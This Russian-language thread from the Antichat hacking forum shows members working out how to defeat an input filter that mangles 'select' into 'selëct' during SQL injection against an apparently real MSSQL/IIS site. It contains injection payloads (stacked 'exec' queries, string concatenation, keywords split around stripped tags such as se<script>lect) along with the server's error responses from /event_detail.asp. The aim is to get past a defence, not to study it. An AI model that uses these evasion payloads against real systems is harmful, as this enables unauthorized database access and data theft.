Форум АНТИЧАТ - фильтрация select в mssql

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - фильтрация select в mssql (https://forum.antichat.xyz/showthread.php?t=75575)

фильтрация select в mssql

вот впервые столкнулся с такой интересной фильтрацией:

если в теле запроса видит select то переводит его в такой вид:

Код:

selëct db_name()

и соотвественно скуль ругается:

Код:

Line 1: Incorrect syntax near ';'.

т.е. вместо второе е подставляет html значение немецкой ё - ë

попытки закодировать select в %73%65%6C%65%63%74

успеха не принесли

если ли еще какие-то варианты?

там же Iis и винда, а ей пофиг на регистр

ээээ... Я правильно понял твою проблему?

Код:

;exec ("SELE"+"CT users"+"FROM tables")

я вообще не встречал, чтоб такая фича гдето работала

посоветую поискать какие слова/символы вырезаются. Именно вырезаются. Так, например, если вырезается тег <script>, то запрос нужно желать таким: se<script>lect

так ведь, дык не вырезается а заменяет на ё

Dima-k17

отвечает:

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ect'.

/event_detail.asp, line 44

обрамляем скобками и видим что не нравится:

Цитата:

1 or 1=(["sel"+"ect" db_name()])--

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Invalid column name '"sel" "ect" db_name()'.

/event_detail.asp, line 44

т.е. при таком запросе просто отбрасывает sel

если пробовать так:

Цитата:

4696; exec (select db_name())--

то ответ:

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ex'.

/event_detail.asp, line 44

подставляем скобки:

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'exëc (selëct db_name())'.

/event_detail.asp, line 44